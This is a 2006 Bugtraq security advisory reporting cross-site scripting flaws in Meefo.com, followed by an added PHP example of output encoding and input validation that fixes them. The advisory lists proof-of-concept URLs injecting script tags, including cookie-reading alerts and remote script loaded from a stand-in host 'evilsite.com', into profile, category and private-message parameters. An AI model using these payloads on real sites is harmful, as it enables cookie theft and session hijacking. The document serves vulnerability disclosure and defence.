Message-ID: <20060610213805.30087.qmail@securityfocus.com>
Date: 10 Jun 2006 21:38:05 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: Meefo.com - XSS with cookie include
Meefo.com
Homepage:
http://meefo.com
Affected files:
reading profiles
index.php
input boxes on profiles
sending private msgs
------------------------------
Reading a profile, with cookie include PoC:
Since data isn't properly filtered (backslashes are added to ' and "), a user can input malicious data, such as
<script>alert(document.cookie)</script>, and it will pop up with the user's cookie. Included at the end of this article are
screenshots of the cookie vuln. Screenshots meefo4 and meefo5.jpg show this.
http://meefo.com/?do=rdprof&user_pp=username<script>alert(document.cookie)</script>
When editing your profile, data isn't properly filtered in the input boxes either, so
<script>alert(document.cookie)</script> works here too.
Another XSS Vulnerability example:
http://meefo.com/?do=rdprof&user_pp=<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT>
Reading categories XSS vuln:
http://meefo.com/index.php?cat=Poetry<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT>
Sending PMs XSS vuln:
http://meefo.com/?messages=send&to=<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT>
Screenshots of cookie include vulns & more:
http://www.youfucktard.com/xsp/meefo1.jpg
http://www.youfucktard.com/xsp/meefo2.jpg
http://www.youfucktard.com/xsp/meefo3.jpg
http://www.youfucktard.com/xsp/meefo4.jpg
http://www.youfucktard.com/xsp/meefo5.jpg
http://www.youfucktard.com/xsp/meefo6.jpg
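
The filtering gap described above (backslashes added to quotes while markup passes through), shown next to HTML output encoding and input validation. This is an added example in PHP, not Meefo's code and not part of the original post; the parameter name user_pp and the sample value come from the advisory's URL, while the function names and the username policy are assumptions.

```php
<?php
// Added example; function names and the username policy are hypothetical.

// Keep the session cookie out of reach of document.cookie.
ini_set('session.cookie_httponly', '1');

// Sample input: the user_pp value from the advisory's first URL.
$user_pp = 'username<script>alert(document.cookie)</script>';

// What the advisory describes: ' and " get a backslash, nothing else changes.
function slash_only(string $value): string
{
    return addslashes($value);
}

// Output encoding for HTML text and quoted attribute values.
function html_out(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Input validation for user_pp (assumed policy: 1-32 letters, digits, _).
function valid_username(string $value): bool
{
    return preg_match('/\A[A-Za-z0-9_]{1,32}\z/', $value) === 1;
}

$slashed = slash_only($user_pp);
$encoded = html_out($user_pp);

// The payload contains no quotes, so backslash escaping leaves it intact.
echo "slash_only: ", $slashed, "\n";
echo "markup survives slash_only: ",
    var_export(strpos($slashed, '<script>') !== false, true), "\n";

// After encoding, < and > are entities and the browser renders plain text.
echo "html_out:   ", $encoded, "\n";
echo "markup survives html_out:   ",
    var_export(strpos($encoded, '<script>') !== false, true), "\n";

// Rejecting the value before it reaches the page is the second layer.
echo "valid username: ", var_export(valid_username($user_pp), true), "\n";
```

The same encoding applies to every reflected parameter listed in the advisory (user_pp, cat, to) and to the stored profile fields.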